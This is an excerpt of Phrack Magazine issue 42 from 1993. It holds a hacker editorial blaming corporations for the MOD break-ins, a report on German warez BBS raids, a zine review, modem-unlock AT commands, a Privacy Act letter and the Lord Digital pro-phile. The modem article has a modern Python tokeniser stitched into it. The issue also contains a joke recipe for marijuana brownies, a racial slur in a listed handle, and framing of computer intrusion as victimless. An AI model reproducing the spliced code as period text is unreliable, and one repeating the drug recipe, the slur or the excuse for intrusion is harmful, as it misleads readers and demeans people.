Even if these charges are to be believed, why isn't the blame being evenly distributed? Why aren't stockholders crying for the heads of system administrators, MIS managers and CIOs? These are the people who have not adequately done their jobs, are they not? If they had expended a bit of time, and a small amount of capital, the tools exist to make their systems impervious to attack. Period. If I had an investment in a company such as Southwestern Bell, I would be outraged that the people I was employing to perform data security functions were not apt enough to keep a group of uneducated gangsters out of their switching systems. Why haven't there been any emergency meetings of shareholders? Why isn't anyone demanding any changes in policy? Why is everyone still employed?

Not to blame Southwestern Bell too harshly, they were sorely outclassed by MOD, and had absolutely no way to cope with them. Not only because MOD were competent telco hackers, but because Southwestern Bell's network service provider had given them free rein. Southwestern Bell's packet switched network, Microlink II, was designed and implemented for SWBT by Tymnet (then owned by McDonnell Douglas). An interesting thing I've heard about SWBNET, and about every other subnet arranged by Tymnet, is that the information concerning gateways, utilities, locations of node code, etc., is purported to be located in various places throughout Tymnet internal systems. One such system was described to me as a TYMSHARE system that contained data files laying out every subnet on Tymnet, the mnemonics (username/password pair) to each utility, gateway, and the ONTYME II mail access keys. If this information is correct, then shouldn't Tymnet be called in to acknowledge their role in the attacks on Southwestern Bell?

Let's say a Realtor sold you a house, but told you that he would be keeping copies of all your keys so that he could help you with the maintenance.
Some time later, you notice that a few of your books have been read, but nothing else is disturbed. Later on you notice that your tv is on and your bed is all messed up. A week later your stereo is gone. You set up a trap and catch someone going into your house with your own key! You find that the burglars had made copies of all the keys held by your Realtor. You then find that the Realtor neglected to put the keys in a safe, and in fact had left them lying around on the table in his back yard labeled with the addresses they corresponded to. Who would you be more upset with? The individual who copied and used the keys, or the Realtor for not guarding access to your valuables more vigilantly? I would personally be far more upset with the Realtor, for if he had put the keys in a safe this event would probably never have transpired.

I'm not saying that people who get caught for breaking into computer systems should be let go, especially if they can be proven to be involved in the sale of hacked information for a personal profit. What I am saying is that if hackers are to be punished so vigorously for what I view as a predominantly victimless crime, then everyone should have to line up and take their fair share of the blame. I think it's high time that the real blame be placed on the corporate entities who seemingly refuse to acknowledge their role in these break-ins. Neglect of duties and lack of responsibility on the part of the employees, the interconnect carriers, the data network providers, the hardware vendors, etc. all play a key role in the problems that exist in the world's data networks today. In fact, if it were not for computer hackers, these problems would continue to lie dormant until either discovered by accident in the field, or the provider decided to go ahead and enlighten its clients about the existence of such a problem.
I wholeheartedly encourage each and every reader of Phrack to purchase one share of stock in any corporation you know that has exhibited such tendencies and take your place on the floor of the next shareholders meeting and scare the hell out of the board of directors. Phrack Magazine is calling a discount brokerage very soon.

-------------------------------------------------------------------------------

==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2c of 14

[ASCII art section banner]

******************************************************************************

BBS Busts in Germany
====================

Thursday, March 18, 1993. This day will be remembered as a black day in German BBS history. In fact, it was the blackest day in German BBS history since the raid of 18 Berlin BBS in Berlin and North Germany a couple of months ago.

What has happened? A couple of Bulletin Board Systems (BBS) have been raided by the police. All these BBS had "warez" online: illegal, pirated, copyrighted software, usually for PC/MSDOS and Amiga. This time, most of these BBS were in Bavaria, South Germany. Now let's take a closer look at the events:

One guy who got busted was MST, Sysop of Southern Comfort BBS in Munich. In fact, his board went offline 9 days before. But he was unlucky enough to still have his computer and his warez. He was even using his modem to trade warez at the very moment the cops rang his doorbell. Why did he go offline so shortly before he got busted? His board had been running for over 1 year. Here is the text file MST released about going offline:

THURSDAY 03-09-93 00:15

THE SOUTHERN COMFORT BBS IS CLOSED !

I AM NOT BUSTED OR ANYTHING LIKE THIS ! I CLOSED THE BBS COS OF PERSONAL REASONS AND PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY ALIVE AND WILL BE HERE AT A NEW??? OPENING ! SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !

MST/RAZOR 1911

A couple of days later, MST was posting ads in local BBS to sell his old equipment. But obviously he wasn't fast enough. Maybe this was one of the reasons the cops busted him on March 18: they were afraid he might get rid of his illegal software, so they hurried up to catch him! He got busted at 10am this morning. Three cops were knocking on his door until he opened. They had a search warrant and confiscated all his computer equipment, disks, modems...

Chris used to have a board until four months ago, and now trades for TDT and other groups. He was in school this morning. His parents weren't home either. So the cops broke into his house, smashed the wooden door, and seized all his equipment. He has been asked to speak to the police this Tuesday. Chris used to be one of the most active traders for PC warez in Germany. He and his friend Michelangelo supported boards like Schizophrenia and Beverly Hills, which they co-sysop'ed. They were also known as the 'Beverly Hills Boys', a new German cracking group. After Chris' bust, a couple of boards were affected: Beverly Hills went offline. Also the German Headquarters of the Beverly Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least 1-3 months offline time. The other Munich BBS and their sysops were really scared after the bust and took down their systems for an uncertain amount of time.

One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for every warez collector. It had 8 modems hooked up (all US Robotics Dual Standard 16.8) and one ISDN line. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which would be put online according to users' requests. But then, March 18 arrived, and the dream was shattered.
Its sysop, Rider, who was happily calling boards the previous day, had the most shocking experience of his life. The cops came and took his BBS.

And more... Ego, co-sysop of a large German BBS, got busted. Andy/Spreadpoint (ex-sysop) got busted. And lots of others...

Unlike the US Secret Service, which delights in seizing all electronic equipment, like stereos, TVs, VCRs, the German cops were just after the computer hardware, especially the hard drives and file servers. They usually come with three or four people. All of the search warrants they were using were quite old, issued last December.

Who is behind those actions? First of all the BSA, Business Software Association. They were also responsible for the recent raids of US Bulletin Boards. In Germany they just announced actions against piracy and bulletin boards. The most active BSA members are Microsoft and Lotus Development. Microsoft, Lotus and the BSA are all located in Munich, Germany, home of Germany's most feared lawyer, Guenther Freiherr von Gravenreuth. This guy has been fighting for years against piracy, young kids who copy games, and especially bulletin board systems. He is also affiliated with Ariolasoft, a huge German distributor for game labels like Activision and others.

In the end, all I can say is: Be aware, don't get caught and don't keep illegal stuff on your board!
(c) 1993 SevenUp for Phrack

******************************************************************************

Carlcory's brownies:

/* Begin cc_brownie.c */

Includes:

#include "4_squares_baking_chocolate"
#include "1_cup_butter"
#include "2_cups_sugar"
#include "4_eggs"
#include "2_cups_flour"
#include "2_tbs_vanilla"
#include "1_third_cup_marijuana"   /* comment out if won't compile on your system */
#include "1_cup_nuts"              /* comment out if won't compile */

void main(void)
{
   heat(oven, 350);
   add(butter, chocolate);
   while(texture!='smooth')
   {
      stir(mixture);
   }
   Add(sugar);
   add(eggs);
   add(vanilla);
   add(flour, pot);
   add(nuts);
   for(timer=0; timer<35; timer++)
   {
      bake(mixture);
   }
   cool(hour);
}

/* The high takes about an hour to come on, but lasts for 12 hrs. (4 brownies)
   Make sure they cool (don't burn your mouth!) and share with friends! */

/* End of cc_brownie.c */

******************************************************************************

GRAY AREAS
Examining the Gray Areas of Life

Gray Areas, Inc.
P.O. Box 808
Broomall, PA 19008-0808
(215)353-8238
grayarea@well.sf.ca.us

Gray Areas is published quarterly and printed on recycled paper. They also participate in local recycling efforts involving cans, glass, clothing, newspapers, and more.

A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may purchase a twelve issue subscription and give 4 or 8 of those issues away as gifts to friends (i.e., the same 4 issues you receive would also go to 2 other recipients). Make check or money order out to Gray Areas, Inc.

STATEMENT OF PURPOSE: Gray Areas exists to examine the gray areas of life. We hope to unite people involved in all sorts of alternative lifestyles and deviant subcultures. We are everywhere! We felt that the government has done a great job of splitting people up so that we do not identify with other minority groups anymore.
There are so many causes now that we often do not talk to others not directly involved in our chosen causes. We believe that the methods used to catch criminals are the same regardless of the crime and that much can be learned by studying how crimes in general are prosecuted and how people's morals are judged. It is our mission to educate people so they begin to care more about the world around them. Please join our efforts by subscribing, advertising your business with us, and by spreading the word about what we're up to.

__________________________

Review by Knight Lightning:

I recently received a copy of the premier issue of Gray Areas, dated Fall 1992 and with a cover price of $4.50 (US). I was impressed with both the laser quality of the printing, artwork, and graphics, as well as the topics and content of the articles.

I would not characterize Gray Areas as a hacker magazine, but the subject did come up in an interview with John Perry Barlow (one of the original founders of the Electronic Frontier Foundation) where he discussed the EFF and its role in defending civil liberties. No, instead I think it is safe to say that Gray Areas pays a lot of attention to the Grateful Dead. Indeed the cover story is titled "Grateful Dead Unauthorized Videos." Additionally, there are several other articles (including the John Barlow interview) that discuss varying aspects of the Dead's history, their politics, and of course their music. An advertisement for the next issue of Gray Areas reveals that even more articles relating to the Grateful Dead are on the way; so if you are a "Dead Head" you will probably fall in love with this magazine!

However, the article that I appreciated most was "Zine Scene," a review of 163 alternative newsletters that included such familiar names as 2600, Hack-Tic, Full Disclosure, and TAP; and others that I intend to take a look at like Iron Feather's Journal and bOING bOING.
The zines reviewed here covered every topic imaginable and I thought it was a great buffet for the mind to have such a handy directory (especially since Factsheet Five went defunct about a year ago). Other interesting articles had to do with video, audio, and software piracy and reviews of music and software. I also enjoyed the great artwork found throughout the magazine in the form of visual aids, comics, and advertisements.

If you are a fan of alternative music or the Grateful Dead, you'll be very sorry if you don't subscribe immediately. If you are interested in alternative publications with more interesting points of view than Time or Newsweek then you owe it to yourself to at least purchase a copy to check it out.

- - - - - - - - -

All letters sent to Gray Areas are presumed to be for publication unless you specifically request that they omit your name or refrain from publishing your comments. If you are writing about something which could incriminate yourself, they will protect your identity as a matter of policy.

******************************************************************************

"Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard"
by The Sausage with The Mallet

If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V.32bis 14.4K capability.

ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
atgw03c6,22gw05cd,2f
ats14=1s24=150s26=1s32=8s34=0x7&w

A very important item is the b1, which tells the modem to use the 16.8K HST protocol. If you do not set b1, when the Sportster connects with another V.32 modem it will go through the CCITT V.32 connect tones and you will not get a 16.8K connect. If you do get an HST connect, you will not hear the "normal" train phase; instead you will hear the HST negotiation, which sounds like a 2400 baud carrier.
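As an added example (not from the article or from Rancid Bacon Productions), the following Python tokenises the three command lines above so each S-register and command can be inspected before anything is sent to a modem, and in particular checks that the plain "b1" the text insists on is present and is not confused with "&b1". Reading each "gw" pair as an address followed by a value is an assumption about the format, not something the article states.

```python
"""Tokeniser for the Sportster AT command lines quoted in the article.

Added example, not the article's own code. The 'gw' pairs are treated
as (address, value) in hex; that reading is an assumption.
"""
import re

# The three command lines as printed in the article (constructed input list).
SPORTSTER_LINES = [
    "ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3",
    "atgw03c6,22gw05cd,2f",
    "ats14=1s24=150s26=1s32=8s34=0x7&w",
]

# One token at a time. Alternatives are tried in this order so that
# "s11=40" and "gw03c6,22" are not read as the basic commands "S" and "G".
_TOKEN = re.compile(
    r"(?P<sreg>[sS](?P<snum>\d+)=(?P<sval>\d+))"
    r"|(?P<gw>[gG][wW](?P<addr>[0-9a-fA-F]+),(?P<val>[0-9a-fA-F]+))"
    r"|(?P<amp>&(?P<acmd>[a-zA-Z])(?P<aarg>\d*))"
    r"|(?P<basic>(?P<bcmd>[a-zA-Z])(?P<barg>\d*))"
)


def parse_at_line(line):
    """Split one 'AT...' line into tuples.

    ('S', register, value)      for Sn=v
    ('GW', address, value)      for gwADDR,VAL (assumed meaning)
    (command, arg_or_None)      for basic commands ('B') and &-commands ('&W')
    """
    if line[:2].lower() != "at":
        raise ValueError("expected a line starting with AT: %r" % line)
    body, pos, tokens = line[2:], 0, []
    while pos < len(body):
        m = _TOKEN.match(body, pos)
        if m is None:
            raise ValueError("cannot parse %r at offset %d" % (body, pos))
        if m.group("sreg"):
            tokens.append(("S", int(m.group("snum")), int(m.group("sval"))))
        elif m.group("gw"):
            tokens.append(("GW", int(m.group("addr"), 16), int(m.group("val"), 16)))
        elif m.group("amp"):
            arg = m.group("aarg")
            tokens.append(("&" + m.group("acmd").upper(), int(arg) if arg else None))
        else:
            arg = m.group("barg")
            tokens.append((m.group("bcmd").upper(), int(arg) if arg else None))
        pos = m.end()
    return tokens


def merge(lines):
    """Fold several lines into one view; a later line overrides an earlier one."""
    view = {"S": {}, "GW": {}, "CMD": {}}
    for line in lines:
        for tok in parse_at_line(line):
            if tok[0] == "S":
                view["S"][tok[1]] = tok[2]
            elif tok[0] == "GW":
                view["GW"][tok[1]] = tok[2]
            else:
                view["CMD"][tok[0]] = tok[1]
    return view


def selects_hst(lines):
    """The article's key point: the plain B1 command (not &B1) must be present."""
    return merge(lines)["CMD"].get("B") == 1


def saves_settings(lines):
    """&W stores the active profile; without it the settings are lost on reset."""
    return "&W" in merge(lines)["CMD"]


if __name__ == "__main__":
    for n, line in enumerate(SPORTSTER_LINES, 1):
        print("line %d:" % n, parse_at_line(line))
    print("selects HST 16.8K:", selects_hst(SPORTSTER_LINES))
    print("saved with &W:", saves_settings(SPORTSTER_LINES))
```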
Finally, if you change the "cd" in the second line to a "cb", your modem will think it is a V.32 Courier instead of an HST 16.8K.

Look for other pfine pfiles from Rancid Bacon Productions in conjunction with USDA Grade A Hackers (UGAH.) Accept no substitutes.

*******************************************************************************

Request to Post Office on Selling of Personal Information

In May 1992, the US Postal Service testified before the US House of Representatives' Government Operations Subcommittee that National Change of Address (NCOA) information filled out by each postal patron who moves and files that move with the Post Office to have their mail forwarded is sold to direct marketing firms without the person's consent and without informing them of the disclosure. These records are then used to target people who have recently moved and by private detective agencies to trace people, among other uses. There is no way, except by not filling out the NCOA form, to prevent this disclosure.

This letter is to request information on why your personal information was disclosed and what uses are being made of it. Patrons who send in this letter are encouraged to also forward it and any replies to their Congressional Representative and Senators.

Eligible requestors: Anyone who has filed a change of address notice with the Postal Service within the last five years.

Records Officer
US Postal Service
Washington, DC 20260

PRIVACY ACT REQUEST

Dear Sir/Madam:

This is a request under the Privacy Act of 1974 (5 USC 552a). The Act requires the Postal Service, as a government agency, to maintain an accounting of the date, nature, and purpose of each disclosure of information about individuals. I request a copy of the accounting of all disclosures made of address change and mail forwarding information that I provided to the Postal Service. This information is maintained in USPS System of Records 010.010.
On or about (date), I filed a change of address notice requesting that my mail be forwarded from (old address) to (new address). The name that I used on the change of address form was (name). This request includes the accounting of all disclosures made by the Postal Service, its contractors, and its licensees.

I am making this request because I object to the Postal Service's policy of disclosing this information without giving individuals an option to prevent release of this information. I want to learn how my information has been disclosed and what uses have been made of it. Please let the Postmaster General know that postal patrons want to have a choice in how change of address information is used.

If there is a fee in excess of $5 for this information, please notify me in advance. Thank you for consideration of this request.

Sincerely,

CC: Your Congressional Representative
    US House of Representatives
    Washington, DC 20510

    Your Senators
    US Senate
    Washington, DC 20515

-------------------------------------------------------------------------------

=Phrack Magazine=

Volume Four, Issue Forty Two, Phile 3 of 14

==Phrack Pro-Phile==

_______________________________________________________________________________

Phrack Pro-Phile was created to provide info to you, the users, about old or highly important/controversial people. This month, we introduce you to an individual who has survived the underground for far too long, the creator of Phantom Access and one of the co-sysops of Mindvox...

Lord Digital
~~~~~~~~~~~~

_______________________________________________________________________________

Personal
~~~~~~~~

Handle: Lord Digital (for like.... fuck I'm old, 13 years now)
Call him: Patrick K. Kroupa
Past handles: M000hahahahahahahah! You're kidding right?
Handle origin: It was given to me by this ancient wise man drinking cheap Absolut by the side of the road...
Date of Birth: 01/20/68
Age at current date: 24
Height: 6'2"
Weight: 185
Eye color: Green
Hair Color: Blonde/brunette/black (subject to change)
Computer: Apple ][+, Amiga 1000, Mac Plus (All in storage)
          Apple //e, Amiga 500, NeXT, Various Suns (Not in storage)
Sysop/Co-Sysop of: MindVox ELItE!@#!!!@#!
Net address: digital@phantom.com

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

If you look beneath the shiny surface of most things, and gaze way-way-way deep down into the murky black festering heart of the human evolutionary process, you are ultimately confronted with the revelation that has stood, nay, LEAPT UP before the ancients since before the days of Atlantis: Life is a lot like NeW WaReZ. Anybody who tried to tell you something different is obviously selling you something.

All things in this universe -- and many others -- can be attributed to New WareZ. The ebb and flow of WareZ is what keeps the very COSMOS from bursting apart at the seams. During periods of time when the flow of WareZ slows to a trickle, times are tough, there is war, pestilence, death, disease, and many rAg PhIleZ. d()oDZ who were happily playing Ultima XXII Quest For Cash, are soon busily hurling insults at each other and dialing the Secret Service. Life is grim, there is a bleak sense of desolation and emptiness . . . for when the WareZ slow down . . . there is little left to live for and you begin to enter withdrawal. An ugly process that, thus far, has only been combatted successfully by Wally Hills NeW WhErEZ Treatment center, where they slowly wean you off the addiction of WareZ and introduce you to the REAL WORLD where you can do things like smoke crack and play in a band.

On the flipside, when there is a good steady flow of WaReZ, the universe hums to itself in happiness and all wrongs are righted, perspectives re-adjusted, and peace, love, and happiness spread throughout the land as the COSMOS re-aligns itself and perfection sweeps the world.
This is a heady time, but one that is sure to be brief, for before you know it some evil glimmer of BADNESS will rise up and somebody will DOUBLE-RELEASE someone else, or a Ware will CRASH when it tries to load . . . and then it's just all over.

A long time ago in a galaxy far, far away . . . I was a founding member of the Knights Of MysterIous keYboArdZ and the Ko0l/Ra{> alliance. At present I am President/Ce0 and Chairman of the b0red at Phantom Access Technologies/Coleco ADAM design Studios, Inc. At the moment our group is working on a multi-tasking, multi-user, CyberSpace environment where the participants can take part in a shared reality that is based upon a cross-relational structure comprised of lots of 0's and 1's all strung together in big twisty chains and kept track of by an Objective-COBOL X/Motif GUI sitting on an SQL dialed into the POWER COMPUTER in Utah, at infinite baud (not to be confused with bps). In the near future I .plan to move to Pigs Knuckle Idaho and cross-breed weasels with ferrets, while devoting the rest of my life to watching daytime TV. It's just that type of thing.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Reality Break
~~~~~~~~~~~~~

It is very difficult, bordering on impossible, for me to remain serious for longer than about 45 seconds, when discussing the "underground" and what it was all about. I rarely bother to mediate or water-down most of my opinions, and there are a lotta places out there in the real world, where anyone who cares can readily access whatever I have to say. There isn't a great deal left for me to convey to anybody regarding my perceptions of the hack/phreak world's history and what it has meant, and shall mean, in the cosmic scheme of things.

The first time I came into direct contact with computers was during the mid-late 70's.
I was around 6 or 7 and my father worked at NCAR during this period of time, which is a futuristic looking series of buildings in Boulder Colorado. This one time I came in, there were all these weird cars driving around in the parking lot, and since there were frequently a lotta strange things moving around there, I never understood until much later that Woody Allen was filming SLEEPER when this was going on. On the same day, I was shown some of the computer rooms, which had just taken shipment on one of the first Crays to go out the door. This left an impression. It was neato . . . One thing led to another. I played around with various things, mainly the really old Commodore PET systems and a slew of heavy metal junk from IBM, until I got an Apple ][+ in 1978. I hung out with a group of people who were also starting to get into computers, most of them comprising the main attendees of the soon-to-be-defunct TAP meetings in NYC, a pretty eclectic collection of dudes who have long since gone their separate ways to meet with whatever destinies life had in store for them. Around 1980 there was an Apple Fest that we went to, and found even more people with Apples and, from this, formed the Apple Mafia, which was, in our minds, really cool sounding and actually became the first WAreZ gRoUP to exist for the Apple ][. Time passed, I picked up more hardware, went on the quest to assemble the perfect Apple-Cat system -- consisting of the Cat, 212 card, BSR, firmware, tone decoder chip, and all the m0dZ NOVATION eventually made to the boardZ -- and ultimately ended up with 3 of 'em, one of which still works (like wow). This led to the first generation of Phantom Access programs which started to seep into the moDeM WeRlD around 1983, with the final revisions being let loose in 1987 or 1988, under the auspices of Dead Lord. By this time I had long since stopped working on them and had relatively little to do with their forms of release. 
Over the years I've been in a seemingly-endless succession of groups and gatherings under nearly 50 different pseudonyms which were frequently invented and dropped, all around that one specific timeslice and reference-point. There were only two that I was ever "serious" about, which is to say I entered into them honestly believing the ideals and reasons for the group's inception, to be valid and worth upholding and being a part of. In other words I was in my mid-teens and my attitude wasn't one of "Yeah yeah, take 10; a buncha dudes are gonna screw around, some of it will be fun, some of it will be silly, and a lot of it will be bitchy and cranky, but hey, I'm only here to amuse myself, so what the fuck . . ."

The two "serious" affiliations were Apple Mafia and the Knights of Shadow. KOS ceased to exist in mid-1984 and I dropped out of the AM around 1985, although to my knowledge it kept going until '86 or '87 when the last surviving members found better things to do with their time. In 1987 I was also "OfFphICiALlLY" inducted into the Fraternal Order of the Legion of Doom, which was just gosh w0wz0. Actually, it's much more fun in retrospect, since most of us are pretty good friends at this point in time, which seemed an unlikely event back in the early 80's.

I ceased to be "active" sometime around 1985, having gained legal access to almost anything I could possibly want to play with, as well as having made friends with people working for NYNEX who de-mystified many things for me. The ultimate conclusion to all of this was that having THE POWER is cool -- and using it to annoy people was absolutely hilarious -- but only led to two possible destinations. You use it all as a learning experience and "grow up" realizing that you're playing cops and robbers, and many of the things you have spent years doing are now illegal and liable to get you into a lot of trouble. You can't go back in time (at least not yet).
You could keep doing stupid things and end up in a legal dilemma over something that isn't very important. Because . . . it really isn't "THE POWER," it's just a very limited form of "it" embodied by a phone system and some computers. And when you compare that to a piece of art, or a collection of music, or a new series of programs that someone has created, you begin to realize that all you're doing is fucking with things that other people made, and you're wasting your time abusing . . .

To cut short my rant, I have no moral judgements to pass upon anyone or anything, because whatever it is that people do, it's some sort of learning process leading towards their destination (whether they realize it or not). The computer underground is just not a place where you can remain "active" beyond a certain period of time that serves as a sort of "rite of passage" towards that something else. To hang around indefinitely and remain "active" is to become a criminal.

Almost everything I've done has taken place with a handful of friends who played various roles in events that transpired -- primary among them Dead Lord (Bruce Fancher), one of my closest friends for the better part of a decade, as well as The Unspeakable One whose name cannot be mentioned for to do so causes rifts within space/time, and a buncha dudes from NYC/NJ who for the most part want to blip their personas off the face of Cyberspace and get on with their lives without the specter of LaW EnForCEmEnT hanging over them for doing silly things as teenagers.

In 1986 I ceased calling anything and didn't access a computer that was hooked into a modem until late 1990. As of late 1992, I have been "retired" for a little over 7 years.

Patrick's Favorite Things
~~~~~~~~~~~~~~~~~~~~~~~~~

Women: Delia! Gorgeous, Intelligent, Wonderful, & able to deal with me.
Men: Bwooooce.
Cars: 928s4, Hyundai, Edsel.
Foods: Italian, red meat, SuPeR Hi PER Pr0tE!n, anything with SPAM.
Music: Any band with the word "LORD" in it (Lords of the New Church, House of Lords, Lords of Acid, Lords of Chaos, Traci Lords).
Authors: Michael Moorcock, Sun Tzu, Machiavelli, Hans Horbiger, Dr. Seuss.
Books: Play of Consciousness, The Book of PAT.
Performers: Bill the Cat, Sting, Perry Farrell, GuNz N RoSeZ, plus anybody who has sold out to the mahnnnnnn fo' $$$$$$$ in a biiiiiig way.

Most Memorable Experiences
~~~~~~~~~~~~~~~~~~~~~~~~~~

Most memorable things are unmentionable and destined to stay that way for a while. Those who played the games know the stories; those who didn't eventually will -- but like, who cares. Everybody should live their own stories, life's an interesting game . . . go play.

Some People to Mention
~~~~~~~~~~~~~~~~~~~~~~

Dead Lord - The one who is not and can never be, yet exists. Solely an infinite layering of the possibilities inherent within personal transmigration and biotechnology? Or alive, with flesh, blood, bone and an adornment of k0dEz & warEZ? You must not be blinded by sight, nor fooled by what things appear to be when they are not, for what is a man when he has not the latest, nor possesses the abilities to acquire same? This is a question perhaps best left to the wise men who roam the meadows of the ozone, forever catching the edge and surfing the waves cresting upon the seas of thought and what is, was, and shall always be.

The Unspeakable One - I know who you are, so tell me who I am, and let's just get on with it okay? Because otherwise, TV is likely to drop the entire facility dead. Anyone of normal caliber can see that to be entirely obvious to thee of the id'ness of pole-cats watching Star Wars. 8+ KlUb ElYtE.

Terminus - A good friend over many years who, as most people know, has recently gone through a lot. The future looks bright, and I look forward to looking back on all this with you in another ten years. [Look, look, looking] (haga!)
Magnetic Surfer - Neato guy who knew me way-back-when, and used to give me gNu Apple wArEz on cassette tape which he had downloaded at the lightning speed of 300 baud. Also provided a means to meeting many of my friends, via Sherwood Forest, when it first existed and hosted Inner Circle and later KOS.

The Phantom - See above, also gave me a full set of TAP copies in 1983, which I never returned to him.

The Plague - A cool guy, close friend before his fatal accident when the truck went off the road near Poker Flats, just 5 miles north of Pig's Knuckle, ID. Tragic, hope he's happy in his new home, far, far underground, running the world's first afterlife/subterranean BBS.

ApPul HeyD!  \    The elYtE peARz of Scepter/InterCHAT who went on to form
SuperNigger   > - DPAK, an entity SO ELITE that it required FOUR letters for
Sharp Rem0b  /    its acronym & brought the world Lex Luthor on HBO!

SuperNigger - Because he is 2 elyTe to be encompassed in merely one line and requires at least two.

Lord_foul - Ahhhh do0d.... Well we all have our roles 2 play. Catch ya in tha outback. (cha mod pla foul sl=999 mi=99,mh=99)

Ninja NYC - One of the few people I have ever met who seems to have mastered the art of being happy wherever he is, doing whatever he happens to be doing. An exceptionally nice human being.

Elven Wizard    \   A collection of compatriots, cohorts, and all around dudEz
The Infiltrator  \  with whom I had an inordinate amount of fun, first ro0l!ng
The Gunslinger   > - the WhEReZ world, then changing our handles (well except
The Bishop      /   for Jeff) & dismantling eliteness and its tarnished allure,
The Gonif      /    along with its cadre of false prophets (namely ourselves
                    under half a dozen other handles).

Andrew  \   "I doan' wannnnnnnnnt any money, I want to be left alone,
Chase    > - tell them to go 'way." May Sutekh look upon our worldly
Asif    /   endeavors and bless us all, everyone. !nseo()d!
Phantom Phreaker - Here's to shifting focus and finding something far more interesting to play with than phones & computers 8-). It's an amazing universe, huh . . .

Lex Luthor - After a ten year period during which we typed to each other once in a while and seemed situated at antipodean sides of the m0dUm Yo0n!veRsE, I finally met with Lex in the very near past. It's shocking to find that he's actually one of the most gracious, funny, and pleasant guys I've ever had an opportunity to meet. Best wishes in whatever you may end up doing!

Erik Bloodaxe - A keg of Sandoz, a Vat of pig's blood, T&C and thee.

Sigmund!@31!@!!! - As the UFOs said, they know who you are, they know where you are. Seriously, hey, it was entertaining. Good luck man.

unReAl PeOpUL 2 MenShun
~~~~~~~~~~~~~~~~~~~~~~~

StJude - For everything. It's good to know you . . . love, light, and a lotta deep-fried giri with ciphers thrown in.

Siva - Look, polygons or voxels, Gibsonian or Post-modern, by Risc or by Cisc with Objective C++ running Smalltalk under Windows NT over the underpass and around the bend; it's gonna happen, and we're gonna be there having a party. Smile, as I think you've mentioned on more than one occasion; it's an interesting time to be alive 8-).

Bruce Sterling - Quite possibly the coolest grown-up I have ever met 8-). Which is saying a lot. The world would be a much better place if Bruce could be cloned and then placed inside a tornado, hooked into a net, fitted with an adamantium exoskeleton, and then dropped into the de-criminalized zone with a BigMac and a holographic tape recorder.

Jim Thomas - Hey so, are you doing more things at once or am I? I bet I can watch TV, listen to music, have three phone conversations, and write an article with 25% greater coherence than Chuck has while eating and watching TV.
On the other hand, writing two books, teaching, reading, running CUD, having a life, and still finding time to hang out are at least level 15 -- haven't hit that yet, but I'm working on it!

Andy Hawks - Hey man. I enjoy what you're doing, keep the faith, ignore the assholes, take inspiration from the inspired, and retain belief in your dreams. Oh okay, gotta go, time to sell out, ignore what I just said 8-).

3Jane - Models/actresses/sex cadets united for a better tomorrow, under Unix with named_pipes and justice for some of us.

Memorable Phreak/Hack BBSes
~~~~~~~~~~~~~~~~~~~~~~~~~~~

8BBS - Long ago, I didn't understand it, or what I was typing, but it was fun.
MOM - Long ago, although by now I did understand it and had slightly less fun.
Pirate's Harbor - Before Norman figured out he could make a killing on TIMECOR.
Pirate's Chest - 6 line 80 meg board circa 1983. Totally Cool.
Adventurer's Tavern - Last bastion of tremendous on-line fun & anarchy. RIP.
Securityland - Nappy's Board.
Pirate's Phunhouse -> Cat's Cavern - The Tempest's system(s).
Dark Side of the Moon - Through many long and strange phases. Still running.
RACS III - w()wZ0 blargel blumpfk0l SwillY sw()nk!@!#!@!!!!!
OSUNY (3 cycles) - Some more fun than others.
Sherwood Forest I, II, III - Liked all three, although 1 was the coolest.
Plovernet - Two phases. Both great.
The (urse - WarEZ do()d & eLIteNEsS Galore!@#!@#!@#!@#
LOD - The Start in 1984, and intermittently thereafter.
COPS - Cool Florida board.
Shadowland - Cool Colorado board.
SpecELITE - So overwhelmingly awful, that it was wonderfully fun.
WOPR - Lotta fun for a while, then he threw everyone off & went 1200only wareZ.
Pirate-80 - It was very effervescent with a touch of jello.
Everything Sir Knight ever ran - Too many names (Tele-Apa, HackNet, NewsNet...)
World of Cryton - WOC! JAMES! ELITENESS!
The Safehouse - Apple Bandit's. Hey, I want my Diskfer ][ dude!
Farmers of Doom - Blo0p.
Pirates of Puget Sound - Nice softwareZ. Lotta fun.
A few things Lord Digital would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BELIEVE EVERYTHING THAT YOU HEAR. KNOW EVERYTHING YOU SEE. UNDERSTAND EVERYTHING YOU DO NOT COMPREHEND. BE AT ONE WITH THE STILLNESS OF THE REVOLVING HAMSTER WHEEL AND FLOSS BETWEEN MEALS.

As far as the future of the hack/phreak world and telecommunications in general is concerned, the PhrAck World is absolutely spiffy and I believe that ISDN will change EVERYTHING and make it rounder, taller, bigger, more stable, and also give later generations something to look back upon and sneer at with contempt.

==Phrack Magazine==

                 Volume Four, Issue Forty-Two, File 4 of 14

                             Prelude to a Kiss
       - Lessons Unlearned Are Doomed To Bring Misery Ad-Infinitum -

The following is an article I wrote for a mainstream computer security periodical called ISPNews. At the time, I had been discussing the idea of a bi-monthly column with the editor at that time, Len Spitz. (Now the editor is Michael Alexander, ex-of Computerworld)

